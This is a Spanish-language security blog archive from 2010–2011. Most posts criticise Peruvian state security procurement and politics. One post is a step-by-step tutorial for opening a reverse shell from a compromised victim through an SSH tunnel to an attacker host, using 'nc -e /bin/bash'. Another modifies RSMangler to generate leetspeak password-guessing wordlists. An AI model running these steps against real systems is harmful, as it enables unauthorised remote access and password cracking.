Walter Cuestas Agramonte, aka, El Enano

RSMangler personalizado para generar mas palabras h4x0r

2011-07-21T23:53:00.002-05:00

El otro dia uno de los colegas en Open-Sec me hablaba sobre su fascinacion con CUPP (http://www.remote-exploit.org/?p=546) y como hacia algo que RSMangler no hace por default : generar palabras en h4x0r y someterlas a las mismas combinaciones que hace con las palabras normales.

Cuando uno pasa palabras de entrada a RSMangler y le pide generar palabras h4x0r a partir de las originales (opcion leet que esta activa por default), solamente genera una palabra h4x0r por cada palabra original y no la combina con otros valores como hace con las palabras originales y normales (numeros, letras, años, caracteres especiales). CUPP si lo hace.

Entonces, aparecio el reto y, en realidad, solo posteo esto para que se aprecie el valor del software abierto que permite que uno siga usando su aplicacion favorita solamente haciendo pequeños cambios al codigo fuente (en este caso es mas patente aun porque RSMangler es un script en Ruby).

La seccion de programa que hay que adicionar antes del loop de generacion es :

file_words.each { |y|
wordlist << y.gsub(/e/, "3").gsub(/a/, "4").gsub(/o/, "0").gsub(/i/, "1").gsub(/l/, "1")
}

wordlist.each { |x|
results << x

results << x+x if double
results << x.reverse if reverse
results << x.capitalize if capital
results << x.downcase if lower
results << x.upcase if upper
results << x.swapcase if swap
results << x + "ed" if ed
results << x + "ing" if ing

if common
(Continua el loop de generacion).

Como se ve, genera las palabras h4x0r adicionandolas a la lista original de forma que cuando entra al loop de permutaciones y generacion de palabras, tambien son afectadas, es decir, combinadas con los otros valores. De esta forma, esta funcionalidad hace lo mismo que CUPP.

Tambien es importante resaltar, por si no se aprecio, que la porcion de codigo necesaria ya se encuentra en el programa y solamente se aplica antes del loop de generacion.

NTP 17799 de cumplimiento obligatorio con fecha limite 31.12.2012

2011-07-21T23:46:00.002-05:00

Esta norma ha hecho mucho bien a las organizaciones del Estado peruano porque ha hecho que esten mas concientizados, no importa que la mayoria ni siquiera ha leido el documento.

Tambien ha sido positivo porque al amparo de dicha norma, se han hecho evaluaciones de seguridad y negativa porque ha sido utilizada para justificar compras de productos que ni los usan o los usan mal.

Ahora, nuevamente se pone una fecha limite de cumplimiento como se hizo hace años. Que paso con los que no cumplieron ? Nada! Quien evalua el cumplimiento ? Nadie!

El Decreto no hace otra cosa que ser majadero al pedir cumplir con tener un plan de seguridad como si alguna organizacion en el mundo pudiese tomar la NTP 17799 (ISO 27002) y cumplir al 100% con todo lo expuesto en ella. Eso implica desconocer el estado evolutivo (involutivo en algunas entidades como la ONGEI) de toda organizacion y que eso es precisamente la base de tener un estandar que si es certificable (evaluable, comprobable, controlable) como el ISO 27001.

Definitivamente, yo ando pensando que solamente "la empresa privada" es la asesora de ONGEI y que cosas como esta obligatoriendad podrian estar apuntando a dejar sembradas opciones de negocio para esa "empresa privada". Espero equivocarme y que esto no sea asi.

Espero tambien, que el proximo gobierno ponga orden y defina una Oficina Nacional de Seguridad que defina la estrategia nacional de seguridad de la informacion y seguridad informatica.

Resultados del Concurso en SUNARP

2011-07-14T17:32:00.002-05:00

La información esta en el web de SEACE y aunque no es sopresa el postor que obtuvo la buena pro, si es de particular interes una nota colocado en el cuadro de calificación técnica que dice :
"(*) El Certificado CISSP correspondiente al SR. Juan Pablo Baby fernandez, se encuentra expirado a mayo de 2011, por lo que el postor no acredita contar con 02 profesionales con certificación CISSP."
Qué pasó? Otra vez no se dieron cuenta que presentaban un certificado expirado ? Presentaron un C|EH (hasta donde se, la persona mencionada esta certificada como tal), pidieron el certificado que muestre que esta vigente su certificación y que mantiene sus 120 ECE por año ?
La verdad es que estos puntos determinan la calidad de postor, proveedor y consultores y por ello es que debería ser revisado cuidadosamente.
Y qué pasó con los otros que participaron en el estudio de mercado e incluso en el proceso mismo ? Por qué finalmente no cotizaron ? No calificaban ?

Se vende cebo de culebra...ah! y tambien inventamos metodologias y certificaciones internacionales de prestigio!

2011-07-08T11:56:00.002-05:00

Parece que existe una fuente inagotable de ganas de hacer que nuestras entidades del Estado aparezcan como las más desinformadas de este planeta Tierra.

En unos Terminos de Referencia pude observar el otro dia que pedian cumplir con las siguientes metodologias :

Open Source Security Testing Methodology
SANS Institute Security Testing Best Practices
CERT Security Testing Best Practices
NIST Security & Risk Management Best Practices
NIST Special Publication 800-115
Open Web Application Security Project

Lo terrible de este requerimiento es que las numero 2, 3 y 4 NO EXISTEN. Una rapida busqueda por Internet (Google, Bing y entrando a los sitios de cada organizacion) nos muestra unicamente una presentacion hecha por Deloitte en Europa.

Luego, en otros Terminos de Referencia, para garantizar que los evaluadores tengan un nivel de conocimiento adecuado se exigen certificaciones y esto es 100% correcto y adecuado. Lo gracioso y tragi-comico es que a la par que las certificaciones de ISC2, ISACA, EC Council, Offensive Security, GIAC, Mile2 ponen dos mas bien particulares :

eCPPT que es una bastante nueva y que se esta empezando a difundir. No se tiene informacion de la cantidad de personas certificadas en el mundo, pero, se que al menos aca hay una persona certificada.
SOHP Stack Overflow Hacking Professional que, despues de este post, por fin vera la luz del mundo...sencillamente esta certificacion NO EXISTE o, si existe, debe ser tan reservada y privada que solamente su poseedores saben de su existencia. Esto es una burla tremenda que equivaldria a quere posicionar el Open-Sec Ethical Hacker al nivel de las certificaciones de EC Council, GIAC, Offensive Security, Mile2 e incluso la de eCPPT!

Por esas razones es que es post inicia diciendo "Se vende cebo de culebra..." porque eso les venden CASI TODOS a las entidades del Estado.

El problema a resolver es la falta de conocimiento de las personas que elaboran estas especificaciones en el Estado, pero, me preocupa mas la falta de etica de quienes les plantean exigir cosas que no existen y eso es una BURLA al intelecto.

Y ojo que si la existencia e internacionalizacion de las certificaciones determina que puedan considerarse como garantia para servicios de ethical hacking, entonces, consideremos al OSEH porque tiene mas de 250 personas certificadas entre Perú, Ecuador y Honduras. Algo que no haremos porque no nos dedicamos ni a la educacion y a certificar personas como core de nuestro negocio.

Apliquen metodologias de verdad! Vayan y saquen certificaciones de alto nivel! No tengan miedo! No se burlen del intelecto de las personas!

Buen fin de semana!

Proceso publico en SUNARP : S/.171,850 por un ethical hacking tradicional a 97 hosts (aproximadamente)

2011-07-01T01:00:00.003-05:00

No pensaba expresarme publicamente al respecto, pero, dados mis posts pasados y el comentario a la nota de ISSA Perú, no puedo dejar pasar esta equivocada forma de contratar un servicio de ethical hacking.

Se trata de un servicio tradicional de ethical hacking para aproximadamente 97 hosts. En forma interna (65) y externa (32). Dejare el tema monetario para el final.

A los consultores se les exige ser Ingenieros Titulados con 5 años de experiencia laboral unicamente sin especificar que tipo de experiencia. Lo primero es exigido por el dichoso Reglamento de Contrataciones y Adquisiciones como dije en un post anterior, PERO, no deberia exigirse experiencia en ethical hacking cuando menos ?

Vuelvo a hacer notar que deberian analizar el mercado local y ver cuantos ingenieros titulados estan metidos en temas de ethical hacking.

Luego, como certificaciones se exigen algunas referidas a seguridad de la informacion y no sobre ethical hacking y/o penetration testing que son respecto a SEGURIDAD INFORMATICA. No existe una sola persona en SUNARP que sepa esto ? Donde esta la ONGEI con sus expertos en seguridad y su apoyo de la empresa privada que no los asesora ? Para este proceso estuvo convocado un proveedor que tuvo la actitud honesta y valiente de decirles por email que no estaban haciendo un proceso que otorgue valor a la entidad y que hicieron ? Sencillamente, lo ignoraron (iniciales otra vez MC de PC, no fue nadie de Open-Sec porque ya habiamos visto fallas hace tiempo en este proceso).

La unica certificacion que se considera para dar puntaje adicional es la de C|EH, pero, recibe el mismo puntaje que una de CISSP o CISA. Por favor! A mis amigos que tienen certificaciones como esas y a los que ademas tienen sobre hacking : puede una certificacion de CISSP, Lead Auditor 27001, Cobit-F o CISA garantizar que el consultor hara una buena labor de hacking ?! NO! Grande, mayusculo y rotundo.

Y por ultimo, el precio basado en un estudio de mercado que parece haber sido hecho de forma mas consciente y responsable que otros que he podido apreciar (algunos no ponen ni el nombre de las empresas que participaron en dicho estudio). Pero, aceptar que se ponga un monto referencial de S/.171,850 por hacer ethical hacking a 97 hosts ?! Poco mas de S/.1,770 soles por host!! Wow!
Para una mejor comprension de las tasas : comprar un servicio de un reconocido como SAINT para la parte externa les salia mucho mas barato : menos de US$3,200 por los 32 hosts externos! WebSAINT PRO
Ni siquiera se piden comprobaciones manuales en todos los hosts, con lo cual, pasara lo que paso en un cliente : llegan llenos de appliances y software automatizado, lo corren, elaboran reportes tambien automatizados y 2 meses despues se les mete un intruso por una vulnerabilidad que el consabido "ethical hacking" no encontro!

Mas aun, durante el estudio de mercado y la bases publicadas no se presenta la cantidad de hosts a evaluar y se hace de conocimiento publico esta informacion en la etapa de consultas y observaciones. Quiere decir que cuando pidieron las cotizaciones si indicaron la cantidad de hosts y no la colocaron en las bases ? O es que los proveedores que cotizaron para ese estudio de mercado se lamieron el dedo, lo expusieron al aire y zas! se les vino el numero magico a la mente!

Lamentablemente, quienes deberian manifestarse se quedan callados en una sociedad hipocritamente condescendiente donde, los que se manifiestan en contra de estos atropellos al intelecto, son calificados de conflictivos.

Y por si acaso, como puede parecer a mas de uno que esta nota es una piconeria porque no dieron valor a la experiencia y certificaciones de hacking, recibi la invitacion a participar en el proceso por parte de un postor y me negue porque no estoy de acuerdo en participar en un proceso que cuestiono.

Saludos!

Mas sobre Anonymous en Perú

2011-06-28T14:22:00.001-05:00

Un comentario mio a una excelente nota escrita en ISSA Perú por Roberto Puyo
http://issaperu.org/?p=445#comment-40

Técnico : SSH port forwarding triangulado

2011-06-23T23:13:00.003-05:00

Necesito sacarme el clavo con esto de no bloggear hace tiempo algo técnico :

Uno de los problemas que deben enfrentar un atacante al establecer conexiones desde Internet es pasar por los filtros de entrada/salida impuestos por los firewalls.
Casi siempre encontramos que las conexiones de entrada a la red estan filtradas y, por ejemplo, un servidor web comprometido solo expone TCP 80 y si acaso, 443. Como tener un shell hacia ese equipo ?

La respuesta conocida desde hace años es que se debe establecer un shell reverso y para existen desde el venerable netcat hasta su versión moderna ncat y pasando por el querido MetaSploit. Algo que también se puede usar es reDuh y, por supuesto, ssh. Hay varias guías que indican como hacerlo, pero, no he encontrado una en Español latino (o no busque bien), asi que ahi va :

1. Se debe haber conseguido alguna forma de ejecución en el servidor victima, por ejemplo, mediante un RFI, un webshell, etc., pero, que no permiten la flexibilidad de una línea de comandos de shell.

2. En el server victima digitar algo como :
victima$ssh -p 31337 -f -N -R *:8081:localhost:8080 optimusprime@hacker.no-ip.org
Esto abre un socket en el puerto 8081 de hacker.no-ip.org
Al hacer un :
victima$ps agux | grep ssh
se podrá ver el proceso ejecutando, pero, aún algo como netstat no mostrará nada.
El objetivo es que al conectarse al puerto 8081 de hacker.no-ip.org, lo redireccionará hacia el 8080 de victima sobre el canal ya establecido.

3. Correr un servicio en el puerto 8080 de la victima para que reciba la conexión reversa como por ejemplo
victima$ nc -l -v -n -p 8080 -e /bin/bash
listening on [any] 8080 ..

4. En hacker.no-ip.org podremos ver el socket aperturado en 8081
hacker:~# netstat -nap
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
......................................................................................................................................
tcp 0 0 0.0.0.0:8081 0.0.0.0:* LISTEN 12060/sshd: optimusprime

5. Conectarse desde otro host al puerto 8081 de hacker.no-ip.org :
otro_host$nc -v hacker.no-ip.org 8081
Connection to hacker.no-ip.org 8081 port [tcp/tproxy] succeeded!
Aqui ya se pueden ejecutar comandos del shell, en este caso, tipo bash

6. En la victima se aprecia la conexión, no se requiere una conexión de entrada, no se generan nuevos procesos y toda la comunicación es encriptada :
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 47934

Saludos!

ADD : Verificar en /etc/ssh/sshd_config de hacker.no-ip.org, exista la linea :
GatewayPorts yes

Anonymous y Perú

2011-06-23T22:47:00.003-05:00

Hoy día particularmente recibi varios llamados,correos, chats, etc. de consulta sobre la operación Andes Libres y la amenaza a Telefónica.

Es bien curioso como la gente se pone atenta cuando estas cosas llegan a los medios de prensa y entonces quieren hacer lo que nunca hicieron : ponerse en posición de defensa.
Como le respondi a una persona, no hay nada nuevo atras de estos ataques, las tecnicas usadas son las mismas de hace años y las vulnerabilidades son las de siempre. Entonces, el mantener seguros los activos de información no debería ser una cuestión circunstancial sino una postura continua.

Podría violar acuerdos de confidencialidad y divulgar todas las oportunidades en que contratados por entidades del gobierno para servicios de ethical hacking, hemos conseguido penetrar sus redes, pero, prefiero apuntar a quienes se erigen como representantes/miembros de Anonymous aca : http://www.piratasdelared.com/

Ayer me tome un momento para comprobar como podían haber violado la seguridad de un Ministerio local y es increíble como existían por lo menos 6 puntos de ataque sencillos. Eso demuestra que no estan seguros y los sitios que han adicionado luego lo corroboran.

Hoy veo que sale el Jefe de la ONGEI, Jaime Honores, a señalar que las entidades del gobierno se encuentran preparadas para el ataque. Este señor no solo demuestra ser un ignorante en esta materia sino que, ademas, demuestra como colocan personas sin capacidad para dirigir los destinos de la informática en el gobierno.
El seguramente cree que propiciar eventos de charlas y correrle herramientas automatizadas "con el apoyo de la empresa privada" es gestionar adecuadamente la seguridad de la información y seguridad informática. Claro, podrían decir que también existe un PeCERT, pero, saben que solo es un nombre y no es tangible.

También vi un "blogger" que salia a decir que Anonymous carecia de orden y organización y que los ataques no iban contra la data, que vea el site de Piratas de la Red pues. Otro neofito.

Para que servirá todo esto ? La verdad, servirá para que las entidades del gobierno compren mas hardware y software que ni saben que hace, pero, que si genera revenue para todos. También, contratarán consultorías con "empresas globales" y les pedirán que les hagan hackeos éticos, eso si : el personal debe ser ingeniero colegiado y tener certificaciones de seguridad de la información, no importa que no sepan ni un poco de hacking.
Resultado :falsa sensacion de seguridad, victimas voluntarias.

Es importante que se sepa que estos temas no atañen solo a tecnológos mas o menos capaces sino a temas de legislación. El otro día un amigo me pregunta : cuantos C|EH que sean ingenieros colegiados conoces ? Mi respuesta fue CERO y su pregunta era reflexiva porque el sabe la respuesta. Entonces, por que se pide esto : porque el Reglamente de Contrataciones y Adquisiciones del Estado Peruano indica que para labores de ingeniería, el personal debe ser titulado y colegiado.
De cerca de 16 C|EH en Perú, ninguno es ingeniero colegiado.
Eso requiere un cambio para poder tener organizaciones que se evaluen correctamente por personal adecuado.

En medio de todo esto hay actitudes hipócritas como las de los que se pelean por email y rajan de los demás, pero, en la foto siempre salen juntos y sonriendo. Y, también, hay actitudes valientes y honestas como la que vi hoy día de parte de un amigo (no diré su nombre por privacidad, pero, para darle una pista a el : MC) : rechazo participar en un proceso de contratacion de ethical hacking para una entidad del Estado porque analizó y determinó que el requerimiento estaba mal planteado y ello iba en contra de la calidad de servicio que merece una organización de nuestro país.

Quisiera no opinar sobre cosas como estas y seguir unicamente con temas técnicos, pero, lamentablemente, el medio que nos rodea debe limpiarse de hipócritas y gente interesada unicamente en llenarse los bolsillos a partir del tema de seguridad de la información y seguridad informática.

Sobre la CAIDA de la Bolsa de Valores de Lima despues de la eleccion de Humala

2011-06-06T23:52:00.001-05:00

"La Bolsa de Valores de Lima es "asisito" respecto al valor de la produccion del Perú. Que se mueva esto fuerte no le hace mella al sector real de la produccion y el empleo en el Perú que es lo que le preocupa a la agente y en segundo lugar, los que participan en la bolsa, pero, no llegan ni al 0,1% de la poblacion peruana. De tal manera que al caer la bolsa afecta a una completa minoria. De tal manera que creo yo que tampoco hay que sobredimensionar esto, no? Hay que darle su importancia, si, porque afecta expectativas futuras, pero, tambien hay que decirle a la gente que a diferencia de otros paises desarrollados, aca que la bolsa caiga, su impacto, en lo que le preocupa a la gente que es su trabajo, su sueldo, su ingreso, la produccion...en el corto plazo, es casi, que no se siente." Jorge Gonzales Izquierdo, Economista. Fuente : 24 Horas, 6 de Junio del 2011. Panamericana Television.

Primer post del 2011 ? Elecciones 2011 Segunda Vuelta - Ollanta y Keiko

2011-06-03T13:25:00.003-05:00

La verdad, me dedique mas a postear en el blog de Open-Sec aunque igual ha sido casi nada.
Me sobran temas tecnicos porque como siempre pienso : cuando alguien tecnico con blog deja de postear es porque anda con trabajo y eso me ha pasado.
Sin embargo, no puedo evitar usar este medio para manifestar mi opinion de este proceso electoral.

Debo iniciar parafraseando algo escuchado ultimamente : Toledo dijo que votar por Ollanta era un salto al vacio, creo que votar por Keiko es lanzarse de una de las torres del Centro Civico hacia el concreto.

Particularmente, mi ideologia politica siempre ha sido de corte socialista y, por ello, el hecho que Ollanta y Keiko sean los que pasen a la segunda vuelta ya es un triunfo ya que el Perú es más que Lima y mas que mi situacion economica-social-politica en particular. Es decir, elegir no pensando solo en "este me conviene y este no me conviene".

En los ultimos dos dias Ollanta ha sido acusado de todo lo que se pueda : sobornos para que salga librado de los juicios que tenia, pago de narcos en su epoca de militar, recibir dinero de Chavez y todo culminara el domingo con los tradicionales insultos a su esposa cuando vaya a votar.
Todo sin pruebas, claro, solamente la afirmacion de personas interesadas o de dudosa calaña.
Keiko dice que hay pruebas de sobornos para salir librado de juicios, donde estan las pruebas ?
Un tipo de mala calaña envio por dias a dos ancianos a la carcel con tan solo una declaracion y luego se demostro que mintio. Todo se dieron golpes de pecho. Ah! Pero, si un narco acusa a Ollanta, hay que creerle.
Un politico de US lo acusa de recibir dinero de Chavez y todos se olvidan de los Wikileaks que demostraron como los politicos en US se meten en las decisiones de otros paises. Es mas, demostraron como politicos locales acudieron al gobierno de US a pedir que impidan que gane Ollanta en el 2006 y, por ello, tuvimos la desgracia de tener un presidente como Alan Garcia.

Que tenemos por el lado de Keiko ?
Tiene una buena formacion academica fruto de la inversion hecha por nosotros los peruanos en sus estudios.
Uso el melodrama en el ultimo debate para decirnos que quiere hacer las cosas en forma diferente a su padre porque ella es madre. Detesto cuando las mujeres toman su genero para escudarse en el y , pero, aun cuando hacen uso de su condicion de madres y mas lamentable es que mencione a sus hijas para convencer a los votantes.
Se ha unido a PPK que dijo renuncio a su nacionalidad norteamericana y, en realidad, aun no hay pruebas que el tramite se haya completado. Imagino que al haber perdido estripitosamente en la primera vuelta, pidio que anulen el proceso ya que como ha dicho, sus principales ingresos vienen de US.
San Roman se une a Keiko, no importa que le patearon el trasero durante el gobierno de su padre.
Castañeda hizo la mayor publicidad de pocas obras publicas en toda la historia de Lima y los que circulamos por varios lugares de Lima, vemos que hizo muchisimo menos de lo dice.
Los demas, son relleno, pero, como sea, lo que demuestra es que Keiko se conviritio en la candidata de los perdedores de la primera vuelta. Es decir, lo que voten por ella, estaran votando por PPK y Castañeda. Votaran por los que no quieren que este pais cambie.
Ni siquiera le doy mucho al asunto de las torturas a su madre y la esterilizacion no voluntaria de miles de mujeres ante lo cual ella solo se quedo callada porque si reclamo, lo hizo en secreto.

Ollanta ha tenido el apoyo de muchos politicos y personalidades, pero, creo que no es lo mas relevante en este momento. Tal vez, rescataria el apoyo de Accion Popular, partido que nos dio a dos de los mejores presidentes de nuestro pais : Fernando Belaunde Terry y Valentin Paniagua.

Sin embargo, me da risa cuando los jovenes entusiastas, inexpertos y desinformados se sorprenden por estas alianzas. Por suerte, mi edad me ayuda a recordar historia pasada como cuando el APRA hizo coalicion con la Union Nacional Odriista en su afan por el poder.

Para alguien que vivio concientemente desde el gobierno de Velazco, como yo, es facil calificar al gobierno de Alberto Fujimori como el mejor y, principalmente, porque su labor permitio dar estabilidad economica al pais y retomar la seguridad ante el terrorismo (que ha vuelto a arreciar con el desastre de gobierno de Garcia desde el 2006). Por mi lado, la llegada de la tecnologia a Perú es lo que permitio nuestro actual avance.
En suma, se le debe mucho a Fujimori, si, ALBERTO FUJIMOR, pero, Keiko no es Alberto y no puede ser tan sirvenguenza de mostrar orgullo por el gobierno de su padre (como si ella hubiese hecho algo en ese momento como no sea estudiar en US) y, luego, deslindar su rol complaciente de "primer dama".
Todos sabemos que los votos que obtuvo en la primera vuelta no fueron por ella, mucha gente desinformada creia que votaba por Alberto Fujimori y otros por la esperanza que lo indulte.

Yo estoy seguro que si gana Keiko, como todo parece indicar, nada cambiara en el pais. Nada cambiara para los que deberia cambiar, para aquellos que mueren de frio en Puno, para aquellos que para ir al colegio deben cruzar el rio en un "deslizador" con sogas, para aquellos que mueren por desnutricion, para aquellos que no saben leer ni escribir, para aquellos que sufren la contaminacion dejada por las mineras, para aquellos que no tienen servicios de salud.
Claro, tampoco cambiara radicalmente para los "dueños" de este pais, solamente, seran mas poderosos.

Al final, si hago el analisis egoista, no me importa cual gane porque me tocara seguir trabajando como siempre, pero, como dije, el Perú es mucho mas grande que Lima.

Debo tambien analizar las propuestas. Creo que el principal error del plan de gobierno de Gana Perú fue ser una mixtura de plan de gobierno con ensayo politico. Pero, tambien creo que en nuestro pais se rehuye a ser directo, vivimos de la hipocresia constante. Nunca se dicen las cosas en la cara, se dicen a espaldas de las personas.
Sin embargo, a diferencia de lo que dijo Garcia, el territorio peruano es de los peruanos y nosotros determinamos que se hace aca o no. Osea, soy peruano para pagarle los impuestos a SUNAT, pero, no para pedir que sigan dañando nuestro territorio las mineras ?! Claro, como ningun twittero se traga el mercurio...
A ver, que vaya Garcia a decirle a los "propietarios" de Asia que ese pedazo de litoral peruano no es suyo...que vaya pues!
La inversion extranjera es importantisima, pero, que sea buena para todos. No se trata de inversion y nuevos empleos mal pagados. Que no inviertan aca porque se les deja hacer lo que les de la gana o porque la mano de obra es mas barata sino porque sera buena mano de obra.
Necesitamos ordenar el pais empezando por sus autoridades. El asunto de policias corruptos es tan malo como el de congresistas corruptos y ociosos : no se resuelve con subir sueldos sino con educacion con valores y controles efectivos.
La educacion no mejora solamente creando examenes para botar gente y remodelando los "colegios emblematicos" y la mejor prueba son todas las peleas callejeras con armas blancas que se han producido desde hace semanas en conocidos colegios limeños. Eso solo se resolveria con los profesores y autoridades educativas adecuadas.

Ante esta estupidez colectiva, lo positivo es que han surgido enfretamientos directos : los jovenes dicen lo que piensan y ellos son los que cambiaran este pais, pero, por favor informense. No sigan a lideres solo porque son "nice" o "cool" sino porque analizaron sus planteamientos e ideologia.
Un vocero de Keiko dijo que se necesitaba un gobierno pragmatico y no ideologico y me dio risa porque sono a "Keiko nos sirve porque no tiene ideas".

El tema es interminable y ya me toca seguir trabajando y ver a mi familia.

Ah! Me olvidaba, el Perú tambien es mas grande e importante que el presidente que tenga. Aun me afano porque las instituciones de mi pais obtengan buenos servicios de hacking asi no los haga mi equipo y, como varios de ellos pueden dar fe, lo hago aun asi no gane un centavo.
En otro aspecto, con mi esposa todos los dias inculcamos valores a nuestros hijos para que nuestro pais sea mejor.

Por esas razones, no importa si es Garcia el presidente o es Keiko u Ollanta, debemos apoyar las buenas acciones, controlar siempre y openernos a lo incorrecto MAS ALLA DE NUESTROS PROPIOS INTERESES.

Hasta la proxima que promete sera algo 100% tecnico, probablemente sobre lo ultimo novedoso que he venido haciendo que es hackeo de smartphones.

Ultimo post del 2010

2010-12-31T21:17:00.003-05:00

Siempre he escuchado gente que pide que el año actual se "vaya" rapido porque les resulto muy malo y esperan que el proximo sea mejor. Yo siempre esperaba que el proximo sea mejor, pero, consideraba que el presente ya habia terminado y nada mas.
Esta vez es diferente, me auno a los que esperan que se VAYA pronto el 2010, fue un año de extremos, mas extremos que los polos norte y sur.

Esto sera un analisis rapido, son 9:26 pm en Lima, Perú...

Tecnicamente, el año fue de lo mejor porque tanto a nivel de equipo como individualmente quede convencido que hay buenas capacidades. Esto suena BIEN "panudo", pero, tuvimos oportunidad de compararnos con colegas en eventos diversos; conocer de las vulnerabilidades mas recientes y entenderlas, pero, mas aun, explicarselas a los demas en charlas y clases; encontrar vulnerabilidad en los servicios de los clientes que otros no encontraron (incluso hubo un caso donde una vulnerabilidad fue divulgada hasta con videos por un "iluminado" y no tenia ni idea hasta donde se podia llegar); modificamos y hackeamos mas toolz que antes (incluso MVelazco desarrollo una nueva y personalmente encontre como pasar por alto las restricciones de una tool de analisis de vulnerabilidad que se esta haciendo mas popular); entrenamos mas de 100 personas en ethical hacking; participamos exitosamente en algunos CtF; en fin, solo puedo pensar en exitos tecnicos.
En el otro extremo y bien relacionado a esto, no consegui que alguien maneje los proyectos en mi lugar y, muy a mi pesar, sigo siendo la cara visible de Open-Sec. Asi no importa que seamos la unica organizacion peruana que tiene 4 hackers de staff y que todos estemos certificados por EC Council y algunos por Offensive Security, GIAC, ISC2, etc. Si los demas no los conocen ni saben de sus certificaciones, es lo mismo que nada.

El desarrollo de la empresa lo resumo en : menos dinero que el año 2009, pero, mejores clientes y de mas renombre.
Una persona me dijo algo : "Lo que la gente ve en Uds. es que son estables a traves de los años". Y es que es bien raro encontrar organizacion que vivan haciendo servicios unicamente y no vendiendo productos y, peor/mejor aun, servicios de ethical hacking.
Pero, se ve que es de extremos ? Poca plata y mejores clientes.
Este año me toco terminar la iniciativa de Ecuador y, sin embargo, llegamos hasta Honduras.
Perú es un medio dificil para hacer negocios de seguridad porque, LAMENTABLEMENTE, aun existen clientes que evaluan subjetivamente basados en cosas el origen extranjero de las empresas, si haces eventos grandes, si les regalan cursos, etc.

En lo familiar, fue lo mismo : pase por la peor de las situaciones en mi vida y al mismo tiempo tengo la mejor familia que alguien pueda desear.
Considero que cada cosa mala da lugar a algo bueno. El problema que afronte me permitio encontrar amigos muy buenos y que incluso me acompañaron en la decision que tome, asi no sea necesariamente lo que ellos harian.

Dado que me propuse no postear cosas personales en este blog, no colocare nombres ni mas detalles y solamente algunas cosas que me vienen a la mente como premisas para el proximo año :

Decir la verdad siempre de frente A LA PRIMERA. Mi norma es decir siempre la verdad, pero, muchas veces trato de postergarlo por no aparecer como rebelde o conflictivo. Eso me ha traido incluso reclamos en los ultimos 2 dias por no decir a alguien que solamente queria ayudarlo aunque en realidad no lo necesitaba.
Difundir mas los exitos de los peruanos en cuanto foro se pueda dar.
Dedicar mas tiempo a mejorar mi estado de salud.
Obtener al menos una certificacion de hacking adicional (este año priorize la inversion en las certificaciones de otros, el 2011 es mio!).
No participar en eventos donde no haya etica y eso implica no aceptar como sponsors a empresas de dudosa etica.

Finalmente, solo quiero desearle un año 2011 MUY BUENO a cualquiera que lea este post, se amigo, enemigo o lo que sea.

FELIZ 2011 !!!!

Mea culpa y entrevista en lamula.pe

2010-12-18T00:36:00.003-05:00

El jueves participe de LimaHack 2010 y en algun momento de aquellos donde no pude con mi genio, mencione como Operation Payback demostro que para hacer ataques no todo es tema de toolz y que mover a las masas es mejor estrategia.
Incluso, mencione el hecho que en algunos casos no habia que descargar nada sino entrar con el browser, seleccionar el objetivo (de acuerdo a lo que ordenara Anonymous) y listo. Dije tambien que alli habia un buen "chunk" de hexa que era un javascript en base64 (creo que no di tanto detalle) y mencione que eso podia ser cualquier cosa.
Entonces, el MEA CULPA : olvide que yo mismo, dias atras, habia compartido con algunos el hecho que este ataque de DDoS usaba LOIC (tambien se usaron otros similares como HOIC aunque no es tan elaborado y no se encuentran los fuentes a pesar que se anuncia con abierto).
Este LOIC es una tool y por eso el MEA CULPA porque SI hay una TOOL de por medio. En realidad, trate de rescatar el hecho que esta tool permite generar un DDOS con colaboracion voluntaria motivada por la convocatoria por redes sociales (twitter en particular).
Incluso, LOIC tiene un "modo" hivemind que permite entregar la maquina propia a un bot controlado via IRC (al mejor estilo del fenecido proyecto SETI).

Aprovecho este mismo post para comentar sobre una entrevista que nos hizo lamula.pe durante LimaHack 2010 : http://lamula.pe/2010/12/17/hackers-peruanos-wikileaks-julian-assange-lamer-insurance/4042
Hace tiempo que no mencionaba el termino lammer porque ultimamente prefiero llamarlos "iluminados", pero, lo cierto es que me gusto el espacio para desmitificar un poco el asunto.
Por ahi lei un comentario que decia que un hacker no se autocalifica segun Eric Raymond y su definicion de hacker como alguein que investiga profusamente algo y comparte ese conocimiento. Yo mismo durante varios años explique el concepto junto con el glider y decia que un cheff tambien puede ser un hacker en su terreno.
Ja! Pero, hay muchas cosas que no ayudan a explicarse por ser purista y exacto, asi que hacker es un termino referido a hackers de tecnologia, para todo lo demas que vuele la imaginacion.
En lo que si me voy a mantener siempre es que un hacker no debe autocalificarse. Yo soy un hacker etico certificado y lo digo porque tengo la certificacion de C|EH que la emite un tercero (EC Council), pero, tambien soy un Evaluador de Penetraciones Certificado (Certified Penetration Tester suena menos erotico) por GIAC/SANS y es mas o menos lo mismo.
Si no tuviese esas certificaciones diria que soy un hacker ? Seguro que no al igual que siempre aclaro el hecho que no soy ingeniero sino tecnico, asi que, no es un tema de dogmas sino de sinceridad y honestidad con uno mismo.
Claro, si alguien me pregunta si me gusta hackear yo respondere que es lo maximo despues de mi familia. Sexo y musica quedan en la cola al paso de los años.

Tiempos movidos...mucho de todo

2010-11-22T23:31:00.002-05:00

Y esa siempre es la razón por la cual es más dificil bloggear en los últmos tiempos, son tiempos movidos donde se hace mucho y de todo.

Las vulnerabilidades siempre parecen ser más de lo mismo y a veces llego a pensar que mi percepción sobre el negocio de los virus y antivirus se da también en las vulnerabilidades. Es dificil aceptar que sigan dandose tantos descuidos en aplicaciones comerciales que tienen grandes inversiones en el desarrollo de software.

Pero, por otro lado, también parece increíble que aún existan aplicaciones hechas a medida que sean tan vulnerables a SQLi, XSS, etc. o que sigan metiendo tanta información en variables de sesión o que consideren que los atacantes nunca querrán vulnerar sus aplicaciones.

Aún en países como el nuestro, el hacker es un ser casi extraterrestre y no se llega a crecer en la misma cantidad de especialistas en hacking que se tiene en otros países. Esto podría paracer bueno para alguien que vive de eso dado que no hay mucha competencia, pero, no es así porque como siempre (pueden ver mis otros posts), el cliente no sabe lo que hay y encima hay mucho charlatan, local y foraneo.

Más allá de todo esto, no hay otra cosa como andar todo el tiempo investigando, analizando lo que pasa con el software, el hardware y la seguridad como un todo. Sí alguien tiene sed de conocimiento, entonces debe practicar el hacking, la medicina y/o la cocina. En todos ellos hay creatividad constante, investigaciones a raudales y una sed de conocimiento satisfecha al vencer retos.

